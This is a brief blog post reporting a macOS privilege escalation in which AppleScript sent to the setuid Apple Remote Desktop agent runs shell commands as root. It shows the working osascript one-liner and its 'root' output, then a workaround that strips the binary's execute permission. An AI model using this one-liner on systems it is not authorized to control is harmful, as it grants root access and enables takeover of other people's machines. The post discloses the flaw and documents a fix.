I saw this on slashdot, but figured that if anyone doesn't read that but reads this (yeah, unlikely) they might want to know about this very interesting exploit. You can use applescript to get the remote desktop agent to execute arbitrary code as root. Here's the output from my machine:
18:55:34:~ >osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root
I tried some other neat things, like creating files, but as root you can do pretty much whatever you want to a system.
My quick fix was to remove execute permissions on ARDAgent, though this probably breaks Apple Remote Desktop. I don't use it anyhow, so meh.
18:59:40:~ >cd /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS
18:59:54:MacOS >ls -l
total 2816
-rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 ARDAgent
18:59:43:MacOS >sudo chmod 644 ARDAgent
Password:
18:59:54:MacOS >ls -l
total 2816
-rw-r--r-- 1 root wheel 1439952 Nov 15 2007 ARDAgent
18:59:57:MacOS >osascript -e 'tell app "ARDAgent" to do shell script "whoami"'23:47: execution error: An error of type -10810 has occurred. (-10810)
There, one hole plugged.
No comments:
Post a Comment